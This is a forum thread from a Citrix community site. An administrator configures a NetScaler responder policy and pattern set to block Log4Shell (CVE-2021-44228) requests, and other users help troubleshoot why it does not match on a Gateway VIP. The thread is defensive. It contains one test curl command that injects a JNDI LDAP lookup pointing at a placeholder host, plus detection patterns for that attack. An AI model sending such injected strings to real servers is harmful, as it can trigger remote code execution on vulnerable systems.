Jump to content
Welcome to our new Citrix community!

Citrix responder policy for Citrix Security Advisory for Apache CVE-2021-44228 seems to work on VIP, but not Gateway VIP


Josh Slaney

Recommended Posts

Citrix released a responder policy for CVE-2021-44228 to drop traffic globally.  https://support.citrix.com/article/CTX335705  I have configured the policy on several netscalers and applied to the default global policy for http.   I am seeing the policy hits increment when i send a curl request to any standard VIP (SSL or HTTP proto)  mimicking the exploit.  Example: "curl -k --user-agent ${jndi:ldap://myserver.com/payload1} https://x.x.x.x"

However, when I test the same example against Citrix Gateway Virtual Server VIP (SSL Protocol), the policy does not increment. This leads me to believe that it is not working at the Gateway VIP level.  Has anyone else seen this?  Is there something wrong with my methodology for testing ?  I have tested manually applying the policy as a responder on the Gateway VIP versus the global policy and its still not blocking.

 

The config on the netscaler looks like this:

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap -index 2
bind policy patset patset_cve_2021_44228 http -index 3
bind policy patset patset_cve_2021_44228 https -index 4
bind policy patset patset_cve_2021_44228 ldaps -index 5
bind policy patset patset_cve_2021_44228 rmi -index 6
bind policy patset patset_cve_2021_44228 dns -index 7
add audit messageaction CVE-2021-44228_Block_Alert ALERT "\"Netscaler CVE-2021-44228 Apache Log4j Block - VIP:\"+HTTP.REQ.LB_VSERVER.NAME+\" Client IP:\"+CLIENT.IP.SRC+\" X-forwarded-For:\"+HTTP.REQ.HEADER(\"X-Forwarded-For\")+\" issued a \"+HTTP.REQ.METHOD+\" for \"+HTTP.REQ.HEADER(\"Host\")+\"\"+HTTP.REQ.URL.HTTP_URL_SAFE+\"\""
add responder policy mitigate_cve_2021_44228 "HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\")" DROP -logAction CVE-2021-44228_Block_Alert
bind responder global mitigate_cve_2021_44228 100 END -type REQ_DEFAULT

 

I'm trying to understand where this policy will really be effective.  It appears it definitely is working at the VIP level. 

Link to comment
Share on other sites

I have bound this policy at the Default Global level for the HTTP protocol. 

I have also tried applying on the Gateway VIP's responder policy and they don't seem to work like they do at the VIP level.  

 

Is there a way to log all of the HTTP headers with the message action I've applied?  My current message action looks like this:

 

add audit messageaction CVE-2021-44228_Block_Alert ALERT "\"Netscaler CVE-2021-44228 Apache Log4j Block - VIP:\"+HTTP.REQ.LB_VSERVER.NAME+\" Client IP:\"+CLIENT.IP.SRC+\" X-forwarded-For:\"+HTTP.REQ.HEADER(\"X-Forwarded-For\")+\" issued a \"+HTTP.REQ.METHOD+\" for \"+HTTP.REQ.HEADER(\"Host\")+\"\"+HTTP.REQ.URL.HTTP_URL_SAFE+\"\""

 

I think I'm seeing some other legit traffic hit these policies internally.  I need to figure out why they are matching on it, and the only way I'll know is if i log all the headers of the requests.

 

Link to comment
Share on other sites

VPn flows vs. regular traffic might be different. If your gateway is integrated with AAA, you can bind the responder policy to the AAA responder bind point (on the aaa vserver only) and responder will run BEFORE authentication attempts. If no AAA, then you can bind to the vpn vserver itself.

 

If you want to log all policy hits, set the audit action in the responder policy AND enable "User configurable log messages" in syslog so that the custom logs messages show up (and include the logging level, you specified in message).

 

I don't know what you mean by:

1 hour ago, Josh Slaney said:

nd the only way I'll know is if i log all the headers of the requests.

 

If you want to log all request or all headers?

For all headers, try http.req.full_header, maybe.

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...